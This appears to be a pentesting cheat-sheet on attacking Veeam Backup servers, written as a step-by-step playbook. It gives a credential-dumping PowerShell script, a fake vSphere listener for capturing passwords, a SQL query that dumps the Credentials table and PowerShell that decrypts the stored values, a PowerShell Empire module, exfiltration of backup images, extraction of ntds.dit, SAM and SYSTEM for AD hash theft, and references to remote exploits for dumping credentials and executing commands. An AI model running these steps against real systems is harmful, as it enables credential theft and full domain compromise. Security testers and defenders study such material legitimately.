Veeam Backup

You can do this step by running the veeam-creds script and extract passwords.

.\Veeam-Get-Creds.ps1

If you are able to connect to the Veeam console and you have the right to create new connections to the hypervisor. You can have Veeam connect to a fake vSphere host.

1. First, run veampot.py on your attacking machine

python3 veampot.py

1. Then, create a new connection to the vSphere server in the Veeam console in the Inventory section;

2. Enter the address of the machine with the running script specifying the connection port 8443;

3. Select the required account and complete the wizard.

4. Finlay, get password in script output.

From SQL management studio (of any SQL management interface access method) run the following again the veeam managemnt database:

SELECT TOP (1000) [id] 
,[user_name] 
,[password] 
,[usn] 
,[description] 
,[visible] 
,[change_time_utc] 
FROM [VeeamBackup].[dbo].[Credentials] 

This will dumpt the password hashes. Copy them and then run a PowerShell interface

Add-Type -Path "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Common.dll" 

$encoded = 'INSERT_HASH_HERE' 

[Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded) 

You may use the VeeamGetCreds.yaml PowerShell Empire module witch adapted Veeam-Get-Creds.ps1 script.

1. copy VeeamGetCreds.yaml to empire/server/modules/powershell/credentials/ folder

2. Run Empire server and client

3. Use as usual Empire module by name /powershell/credentials/VeeamGetCreds

When you have a valid backup image, Veeam provides a restore mechanism by "VBK Extract". You can exfiltrate the backup images and extract the backup in multiple extensions like VMDM, VHD, or VHDX on your attacking host.

#Before, copy backups files in the current directory
#VBK Extract on linux
tar -zxvf VeamExtract*
./extract

We can then create a new VM from this files or mount it to our disk to recover sensitive files.

From the Veeam console, to restore individual files, you need to select the required VM from the list of tasks from the section Backups > Disk > ${JOB_NAME} and select the recovery mode for individual files from the menu.

After completing the wizard, a file selection window will open. To restore and decrypt the Active Directory database, you can extract several files:

• ntds.dit — encrypted AD database;

• SYSTEM — registry branch containing the BootKey encryption key;

• SECURITY — registry branch containing cached LSA Secrets passwords;

• SAM — The Security Accounts Manager, which contains password hashes of local users.

We may use the sfewer-r7's exploit (C#) to dump credentials from a remote Veeam server.

Alternatively, we may use this exploit (C#) from horizon3ai.

We may use the sfewer-r7's exploit (C#) to run an arbitrary command with local system privileges on the remote Veeam server.